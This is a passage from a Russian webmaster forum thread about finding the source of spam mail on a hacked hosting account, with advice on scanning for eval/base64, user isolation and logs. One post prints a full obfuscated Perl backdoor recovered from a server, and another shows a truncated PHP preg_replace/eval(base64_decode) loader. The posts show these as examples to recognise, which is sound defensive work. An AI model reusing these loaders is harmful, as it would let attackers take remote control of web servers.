Для вступления в общество новичков и профессионалов домен-индустрии, пожалуйста нажмите здесь ...

   
 Купля-продажа и обсуждение доменных имён
        

  
Вернуться   Форум о доменах > Дизайн и развитие проектов > Начинающему веб-мастеру
Регистрация Реноме Правила форума Справка Пользователи Социальные группы Все разделы прочитаны
Начинающему веб-мастеру Инструкции, часто задаваемые вопросы и программы обучения.

Ответ
 
Опции темы
Сегодня
от 149р за .RU
Аренда сервера
2x Intel Hexa-Core Xeon E5-2420
Всего 79 евро!

с видеокартой GeForce GTX 1080 Ti
всего 99 евро!

от 149р за .РФ Реклама на DomenForum.net
Старый 21.02.2017, 14:29   #21
 
Регистрация: 21.10.2016
Сообщений: 5
Доменные сделки: 0
Реноме:
Одобрения
Спасибо (Отдано): 0
Спасибо (Получено): 3
К проблеме подходите комплексно!
https://www.revisium.com/ai/
а так же выкачайте исходники себе на комп и прогоните поиском по всем файлам на наличие eval, base64(что это? погуглите)
практически все шелы кодируются и по коду их легко найти на сервере.
не будущее не размещайте сайты под одного юзера(root) и про chown и изоляцию в chroot еще почитай
а то получится так что ищешь на ru а зараза сидит в РФ )
не так всё просто и я помню, когда меня в первый раз ломали...
Почитай вот это Основы програмирования для жадных https://cloud.mail.ru/public/f4c6735...ia-zhadnih.zip
Учавствовал в складчине здесь - LINK
Может быть поможет!
keywords вне форума   Ответить с цитированием
Старый 25.02.2017, 00:55   #22
 
Аватар для pegs
 
Регистрация: 07.02.2008
Адрес: Лимпопо
Сообщений: 5,352
Доменные сделки: 17
Реноме: 1903
Одобрения
Спасибо (Отдано): 444
Спасибо (Получено): 1671
Когда некоторое время тому назад вел небольшой хостинг было дело, пришлось попотеть пока нашёл бяку... К одним клиентам через FTP закачали небольшие закодированные перловские файлики, через которые извне запускали скрипты на хостинге. Причём отследить запуск было сложно ибо
1) параметры передавались через cookie обычным get-запросом.
2) через этот скрипт закачивали другой монстровый скрипт и запускали его в фоновом режиме. А там уже этот скрипт конектился на внешний сервер и оттуда координировался. В конце скрипт самоудалялся. Всё было круто.

Поэтому по логам хостов было сложно связать все эти события и найти откуда ноги растут.

ТС, у Вас есть время рассылок. Соберите все логи и посмотрите, что запускалось в это время (+/-). Возможно найдёте виновника рассылки.

И так просканируйте скрипты на подозрительные включения base64 и пр.

добавлено через 7 минут
Кстати вот тот маленький перловский файлик. Забавно выглядит

Код:
#!/usr/bin/perl

$??s:;s:s;;$?::s;(.*); ]="&\%[=.*.,-))'-,-#-*.).<.'.+-<-~-#,~-.-,.+,~-{-,.<'`.{'`'<-<--):)++,+#,-.{).+,,~+{+,,<)..})<.{.)-,.+.,.)-#):)++,+#,-.{).+,,~+{+,,<)..})<*{.}'`'<-<--):)++,+#,-.{).+:,+,+,',~+*+~+~+{+<+,)..})<'`'<.{'`'<'<-}.<)'+'.:*}.*.'-|-<.+):)~*{)~)|)++,+#,-.{).+:,+,+,',~+*+~+~+{+<+,)..})<*{'`'<'<---~.)-,-(-*-:)'-}.<)')+.:)'):+'.:)<'`'<'<.{'`'<'<'<-}.<)'):)+-{)|)+.-)<*}.*.'-|-<.+):)~*})~)|)+.:)<*{'`'<'<'<-<--):)+-{)'-#-,)').-{-,.<).)<.{-#-,.:.+*{.}'`'<'<'<.)-,.+.,.)-#):)+.-)<*{'`'<'<.}'`'<.}'`'<.)-,.+.,.)-#):.,-#-+-,--)<*{'`.}'`'`.*.,-))'-,-#-*.).<.'.+-<-~-#,~---(.*.+'`.{'`'<-}.<)'):)+..)|)+-{)<*}+',~*{'`'<-<--):)()+-{)<.{)+-{*})--,-#-*.).<.'.+-<-~-#,~-.-,.+,~-{-,.<):)<*{.}'`'<-<--):):)()+)+..)<.|.|):)()+-{)<.|.|):)(-|-,-#-..+-:):)+-{)<)<)<.{.)-,.+.,.)-#*{.}'`'<-}.<)')+-)*}).).*{'`'<-}.<)')+..-|*}-|-,-#-..+-:):)+)+..)<*{'`'<-}.<)')+-{-|*}-|-,-#-..+-:):)+-{)<*{'`'<-}.<)')+.)-|*})+..-|),)+-{-|*{'`'<-}.<)')+---|*})+..-|)})+.)-|*{'`'<-}.<)')+-)-**})+---|)~)+-{-|*{'`'<---~.)):-}.<)')+-~*}*'*{)+-~*|)+---|*{)+-~){*})+-{-|)<'`'<.{'`'<'<-}.<)')+.'*}.*.,-).*.+.)):)+)+..)|)+-~)|)+-{-|)<*{'`'<'<)+-))#*}.,-#.'-(-*-{):).-().)#)+-{-|)|)))+-{)))',#)')))+.')))<*{'`'<.}'`'<-<--):)+.)-|)<'`'<.{'`'<'<-}.<)')+.'*}.*.,-).*.+.)):)+)+..)|)+---|)|)+.)-|)<*{'`'<'<)+-))#*}.,-#.'-(-*-{):).-().)#)+.)-|)|)))+-{)))',#)')))+.')))<*{'`'<.}'`'<)+)+..*})+-)*{'`'<.,-#-+-,--)')+-)*{'`'<.)-,.+.,.)-#*{'`.}'`'`.*.,-))'-,-#-*.).<.'.+-<-~-#,~---(.*.+,~-)-|-~-*-{.*'`.{'`'<-}.<)'):)+..)|)+-{)<*}+',~*{'`'<-<--):)()+-{)<.{)+-{*})--,-#-*.).<.'.+-<-~-#,~-.-,.+,~-{-,.<):)<*{.}'`'<-<--):):)()+)+..)<.|.|):)()+-{)<.|.|):)(-|-,-#-..+-:):)+-{)<)<)<.{.)-,.+.,.)-#*{.}'`'<-}.<)')+-)*}).).*{'`'<-}.<)')+..-|*}-|-,-#-..+-:):)+)+..)<*{'`'<-}.<)')+-{-|*}-|-,-#-..+-:):)+-{)<*{'`'<-}.<)')+-)-|*}*:*(*<*)*'*{'`'<-}.<)')+.)-|*})+..-|),)+-)-|*{'`'<-}.<)')+---|*})+..-|)})+.)-|*{'`'<-}.<)')+-)-**})+---|)~)+-)-|*{'`'<-}.<)')+.+-{*})+-{*{'`'<---~.)):-}.<)')+-~*}*'*{)+-~*|)+---|*{)+-~){*})+-)-|)<'`'<.{'`'<'<-}.<)')+.'*}.*.,-).*.+.)):)+)+..)|)+-~)|)+-)-|)<*{'`'<'<)--,-#-*.).<.'.+-<-~-#,~---(.*.+):,|)+.')|)+.+-{)<*{'`'<'<)+-))#*})+.'*{'`'<'<)+.+-{*}.*.,-).*.+.)):)+.+-{)|)+-)-|),)+-{-|)|)+-{-|)}):)+-)-|),)+-{-|)<)<)#.*.,-).*.+.)):)+.+-{)|*')|)+-)-|),)+-{-|)<*{'`'<.}'`'<-<--):)+.)-|)<'`'<.{'`'<'<-}.<)')+.'*}.*.,-).*.+.)):)+)+..)|)+---|)|)+.)-|)<*{'`'<'<)--,-#-*.).<.'.+-<-~-#,~---(.*.+):,|)+.')|)+.+-{)<*{'`'<'<)+-))#*})+.'*{'`'<.}'`'<)+)+..*})+-)*{'`'<.,-#-+-,--)')+-)*{'`'<.)-,.+.,.)-#*{'`.}'`'`.*.,-))'-,,~-,-*.)'`.{'`'<-}.<)')+-*-~-+-,*}.*-:-<--.+*{'`'<)--,-#-*.).<.'.+-<-~-#,~---(.*.+,~-)-|-~-*-{.*):)+-*-~-+-,)<*{'`.}'`==]="&&[=|\\\@"\\#x"!([[=#\$=]="&\%[=!?=]##=^ ]="&\%[=.'+{-,)*(:*.(<('')*|.-(`*-(:)-,|-(*'+,(.+{)()}(:*`'<*#-}-(+~()+),-.,.#,(,<-'-#)`,-.+'}.:'<*{*.'.*|'#)~.#*:((.)*}*#'-.',(,<-'*<)*'<-,+,'.({*.){'|*-(#)<*#-(*#*|.{'-){.<+#*),.*<*#'))*+)+<-(,{*+(*.*+#*`-{(:)},~(+(~-<,*-**#(*-`.)(<.:+,(`')*+)},(,<-*).)~+{-(,`+~(:*`*''|).,(+',~'#**,.(#-(,{))-',`-*)-*<':)+,`,`+~'((')}):){'-'+)-*:(~+~(:).*{((*-())*))+*.+(~+<(--<,*-*,`'{)-*.(<):(#+.+)-<,*-*,`(~*<**+{(-,<((''*.)}+).`,(+',~-)*-,<((''*.)}+)''+--|','+)-,}(.(~-:-**`(,*,'*(:)#(((`,+*:*}*`'(*-(#.'-|*:'`.,*<*+'('}*:(-){'..`+*)),*'-({)'*-(#*|':***:'`):,*,`+|)-*`(`.++*-*'},<(:(~+<-(,{,''**,+))<*<',){,*(((~.`'`+-)*'{)<*}+*-)-,(|'`--)(,).++--|','+)-,}(.(~-:-*){(,*,'*(:)#(((`,-({.#)<'{*''(-).():.(((,#(:))*,'*).+)-}'`+,-)(`,-'`.{.'+--(+*-*.~-(+|*~'<-(,{,'-**)'-){)+'--}'-,{,',:,'-*,`':)**:'-)`,)(.+*'(.',(,<-*+*,~'))*(#(}({*.*.+)(,+--}-:+|-{()(#+).{,*-*,`-**(,|-)+|*~.{'<*{*.'.*|'#)~.#)}-|'}.:-),{,'-*)''~)+*)+*(-(`,')|(.'}+`.(++-#)++,-.(-*`*~'-'<+,-)++.`'`(<(<,:)#(<'#*.+:.~,`-*-}-(+|*~.{-)),*('**~'~-)*)'#)*,~(|'#*-.((:*-'<*|.#*:-<()('+.-*-<,:-.+-.`.~+)-*('(#'#*|*#(#*{+)-#*++)-|*|.{-),{,'((,<-*+*,~-)+|+-''')*|)}+`(,+`-#*+,'+~*~.{-),{)+-',`-*+*,~':)<,<'('#.`(~+*-:-'+*,~-)+|+-''')*|)}+`.(),'('`',-.'}.:-),{,'(.,<-*+*,~':)<,<'('#.`'`+*-:-'+*,~(-+~*~'~,',:)+-',<(`*:*~',*((-,'):*}*.(#*-'+*#.{*~*|+-(.,(.))}'~){(#-,)-'.)+,~(|*.*|','+.(,(+',|'-*|(-,-',-~.#*<*<)'(|*})#.*++(<*<'{**+}-:-').)~+{-(,,+~+|.,-)-'*#(*-`(-(*.:+,')'.*{)}+).|,(-,.`+~''.:)+('.,((*#'.*`(,(,)+'`.}*{)#.,)++*-:-')|*<(<)',.(('*.)*+(*.*+#*).-+*',+#,{-()<,*-**#(*-`.#+~)#(`,-(}.{-+(<)*'-)*))+*-`'{,}+..-)(+*-:-'+**~'}-}()(<+{*|*|+`..'+-*)}',)'+#'-,')~,*-*)+'))**`'#-}()'+,-)|.-*-.-+)((--+-.|,.,~'}'~'),`.#,*){.{'}(:(~,}'|)(*+'*.`-'+*)}-(+|*~,-':.|-+'<*{(:-)*#'#*}(#,-,`.{.',(,<-**.,|(-+~*|({'}.`.}'<.*'~*{.-+|*),#({':*`.<(<)-(`)~)+'})'+)(('*.)-:,+.*+,)#**(}-`,:'.'.*#.<,:-}+`-,*)'#**(<(|(#*#*,+`.,+|-`**':)},<,))+(<.#+*,<((+',~({*.,~(|(~.).{),(:*-)+.+,'+~+{.:'#*#)`'**,+)-#*,,-*{(<)|(:).)<'~)('|)~))':)}(-,`+,.<.'+`.{++-(.~+{-}(:,<+).).(++.:+*-#.<'|*-,{({+),:))-',`+|*<)*({)'++(+'#)-*`').{+#.{.`+~..(`,-,:.#.},#.`,(+'){-()',`'('#,:))-',`(<**),(~)',{,`+~*(.',(,<(.+'==]="&&[=|\\\@"\\#x"!([[=#\$=_#?#|\@">!?[=]="&\%[=!?=]##=^;;y; -"[%-.:<-@]-`{-}#~\$\\;{\$()*.0-9\;\\_rs}&a-h;;s;(.*);$_;see;
добавлено через 9 минут
Если найдете подобную бяку, значит Вам тоже "повезло".
__________________
«Палата номер 6» ищет своего Главврача

Последний раз редактировалось pegs; 25.02.2017 в 01:04. Причина: Добавлено сообщение
pegs вне форума   Ответить с цитированием
Старый 28.02.2017, 09:52   #23
 
Аватар для Port_Artur
 
Регистрация: 03.12.2006
Адрес: Россия
Сообщений: 3,492
Доменные сделки: 24
Реноме: 1548
Одобрения
Спасибо (Отдано): 527
Спасибо (Получено): 750
Отправить сообщение для Port_Artur с помощью ICQ
А какое расширение у перловских файлов?
Port_Artur вне форума   Ответить с цитированием
Старый 28.02.2017, 10:05   #24
 
Аватар для pegs
 
Регистрация: 07.02.2008
Адрес: Лимпопо
Сообщений: 5,352
Доменные сделки: 17
Реноме: 1903
Одобрения
Спасибо (Отдано): 444
Спасибо (Получено): 1671
Сообщение от Port_Artur Посмотреть сообщение
А какое расширение у перловских файлов?
На расширение не ориентируйтесь (.pl, .cgi...). Контент смотрите. Так же смотрите настройки Апача, включен запуск cgi скриптов или нет (если cgi Вам не нужно, то вообще лучше убирать cgi).

На php тоже может быть похожая галиматья через preg_replace
Код:
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'7X1re9s2z/Dn9VcwmjfZq+.......='\x29\x29\x29\x3B",".");
Общий смысл её тот же.
__________________
«Палата номер 6» ищет своего Главврача
pegs вне форума   Ответить с цитированием
Старый 01.03.2017, 09:50   #25
 
Регистрация: 21.10.2016
Сообщений: 5
Доменные сделки: 0
Реноме:
Одобрения
Спасибо (Отдано): 0
Спасибо (Получено): 3
Сборник PHP-бекдоров для ознакомления и поиска бяки
https://github.com/bartblaze/PHP-backdoors
ещё в помощь декодер, если найдёшь что то подозрительное у себя
The Online PHP Decoder
http://www.unphp.net/
keywords вне форума   Ответить с цитированием
Старый 01.03.2017, 11:28   #26
 
Аватар для pegs
 
Регистрация: 07.02.2008
Адрес: Лимпопо
Сообщений: 5,352
Доменные сделки: 17
Реноме: 1903
Одобрения
Спасибо (Отдано): 444
Спасибо (Получено): 1671
Сообщение от keywords Посмотреть сообщение
Сборник PHP-бекдоров для ознакомления и поиска бяки
Да их может быть немерено. Главное анализировать использование eval, preg_* (с eval флагом) и т.п., как и любые "шифровки" кода. Если что-то подобно нашлось - разбираться.

Если у ТС-а нет shell доступа, то посоветовал бы выгрузить всё (!) на локальный диск и там уже искать, сравнивать и разбираться.
__________________
«Палата номер 6» ищет своего Главврача
pegs вне форума   Ответить с цитированием
Старый 25.04.2017, 22:13   #27
 
Аватар для Port_Artur
 
Регистрация: 03.12.2006
Адрес: Россия
Сообщений: 3,492
Доменные сделки: 24
Реноме: 1548
Одобрения
Спасибо (Отдано): 527
Спасибо (Получено): 750
Отправить сообщение для Port_Artur с помощью ICQ
Короче, спамом похоже оказались уведомления о регистрации новых пользователей. Шли на старую почту и я их не видел. Какая-то хрень в автомате регистрировала пользователей и стопорила всю почту с хостинга. Теперь никто не может зарегистрироваться, да и не нужно.
Port_Artur вне форума   Ответить с цитированием
Старый 25.04.2017, 22:18   #28
 
Аватар для pegs
 
Регистрация: 07.02.2008
Адрес: Лимпопо
Сообщений: 5,352
Доменные сделки: 17
Реноме: 1903
Одобрения
Спасибо (Отдано): 444
Спасибо (Получено): 1671
Обычно капча помогает.
__________________
«Палата номер 6» ищет своего Главврача
pegs вне форума   Ответить с цитированием
Ответ



Реклама

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 
Опции темы
Закладки Добавить Тема в закладки

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход


Текущее время: 06:38. Часовой пояс GMT +4.